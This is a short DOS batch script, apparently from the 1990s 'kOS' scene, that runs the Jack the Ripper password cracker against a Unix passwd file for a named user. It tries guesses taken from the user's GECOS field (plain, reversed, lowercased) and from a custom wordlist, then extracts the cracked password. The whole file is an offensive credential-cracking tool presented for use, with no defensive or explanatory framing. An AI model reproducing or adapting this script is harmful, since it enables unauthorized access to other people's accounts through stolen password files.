@ECHO OFF
CLS
ECHO kOS KracK
REM Made by The Raven for Global kOS
ECHO KracKing %1 passwd with GECOS
JPP -USer:%1 -Gecos:8 -MInlength:6 -MAxlength:8 passwd | GREP -v [0-9] | JACK -Pwfile:passwd -STdin -User:%1 -List
ECHO KracKing %1 passwd with Reversed GECOS
JPP -US:%1 -G:8 -MI:6 -MA:8 -REV passwd | GREP -v [0-9] | JACK -P:passwd -ST -U:%1 -L
ECHO KracKing %1 passwd with Lowercased GECOS
JPP -US:%1 -G:8 -MI:6 -MA:8 -LOWE passwd | GREP -v [0-9] | JACK -P:passwd -ST -U:%1 -L
ECHO KracKing %1 passwd with GECOS
JPP -G:3 -MI:6 -MA:8 passwd | GREP -v [0-9] | JSORT | JPP -I | JACK -P:passwd -ST -U:%1 -L
ECHO KracKing passwd with kOS
JACK -Pwfile:passwd -Wordfile:kosdict.doc -User:%1 -List
ECHO KracKing passwd with Reversed kOS
JPP -REVerse kosdict.doc | JACK -Pwfile:passwd -STDin -User:%1 -List
ECHO KracKing passwd with Lowered First Char kOS
LOWERFST kosdict.doc | JACK -Pwfile:passwd -STDin -User:%1 -List
JACKPOT passwd | GREP %1
